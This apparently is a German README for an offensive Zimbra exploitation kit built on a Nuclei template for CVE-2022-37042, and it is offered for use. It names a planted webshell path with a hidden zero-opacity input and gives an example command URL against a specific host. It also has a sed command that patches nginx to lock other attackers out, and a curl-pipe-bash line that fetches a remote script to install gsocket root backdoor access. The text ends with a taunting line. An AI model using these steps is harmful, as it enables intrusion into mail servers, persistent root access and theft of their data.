
Zimbra CVE-2022-37042 einsatzbereite Nuclei-Vorlage
Shell-Pfad: /public/formatter.jsp
Nuclei selbst: https://github.com/projectdiscovery/nuclei
Die Shell hat ein verstecktes Eingabefeld mit 0 Deckkraft. Fahren Sie einfach mit der Maus darüber, geben Sie den Befehl ein und drücken Sie dann die [Enter]-Taste:
Beispiel-Shell-URL:
https://ms1.fission.com:8443/public/formatter.jsp?cmd=id
Führen Sie diesen Befehl aus (nur einmal):
cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;
Es wird zusätzlicher Code für Server benötigt, die nicht Nginx, sondern Apache verwenden. Pull-Requests sind willkommen.
curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1
Dieser Befehl installiert global-socket (https://www.gsocket.io/deploy/) und übergibt Ihnen den Schlüssel, um sich als root zu verbinden.
Frohes Geburtstagsmassaker, ihr Motherfucker ;)